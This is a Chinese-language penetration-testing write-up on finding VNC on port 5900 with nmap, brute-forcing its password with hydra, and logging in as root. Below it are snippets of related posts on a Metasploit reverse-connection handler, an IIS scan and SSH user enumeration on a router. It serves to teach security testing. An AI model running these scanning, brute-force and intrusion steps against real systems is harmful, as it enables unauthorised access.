5900埠是遠端控制軟體vnc的預設監聽埠。
nmap具體使用方法可以參考:
(1)將收集到的活著的ip放到乙個txt資料夾中,利用:nmap -il ip.txt 進行批量掃瞄埠;
或者可以參考:
(2)使用:nmap -pr -on /home/xh/shentou/out.log 192.168.10.0/24 直接 掃瞄乙個網段內所有的ip,掃瞄的結果會儲存在out.log裡面;
hydra的使用參考:
(1) hydra -p /home/xh/shentou/pwd_ssh1.txt -e n -t 1 192.168.10.13 vnc -v
-p,指定密碼列表
-e,嘗試null和相同(與使用者名稱相同)密碼
-t,以指定要執行的parralel程序的數量
-v,用於詳細
停止檢查相同的密碼,-en
(1)安裝xvnc4viewer:xvnc4viewer是個沒有圖形介面的程式,ubunut安裝的方法:~$ sudo apt install xvnc4viewer
(2)使用xvnc4viewer連線5900埠:
安裝完使用:在命令列輸入xvnc4viewer命令後在server :處會要求輸入遠端伺服器的ip位址和對應的埠號,如果不輸入埠號預設連線5900,輸入後回車,接下來會要求輸入遠端伺服器的vnc登入密碼,正確輸入密碼後會從新彈出乙個圖形登入介面。
可以看到已經入侵到服務內部了,而且還是root許可權。
參考:
記一次內網滲透
1.生成乙個木馬檔案 2.將生成的木馬上傳到目標機器上 3.啟動msfconsole。4.準備工作 1 use exploit multi handler 2 set lhost 192.168.20.11 3 set lport 1234 4 exploit 5 執行之前準備的木馬檔案 5.開始試...
記一次滲透測試
首先使用superscan掃了一下常用埠,沒有問題,只開了80,返回iis5.0,win2k差不離 掃瞄常見cgi iis漏洞,沒有問題,打了sp4補丁,到目前為止還不錯 到網頁上轉了轉,發現是用asp寫的,自然要掃掃sql注入了,也許你以為這次成功了吧,很不幸,沒有。自己做的網頁,自然沒有asp源...
記一次滲透測試某路由器
開局乙個路由器,滲透全靠莽,漏洞全靠猜!簡單記錄一下 某個廠商的路由器,網上找不到該型號路由器的相關資料,韌體也搜尋不出來!ssh埠開放,測試發現存在使用者名稱列舉漏洞,存在使用者root,爆破也沒有什麼結果 ssh登入提示警告,登入禁止,所以就算爆破出來密碼也沒啥用了,放棄之 有的zebra路由埠...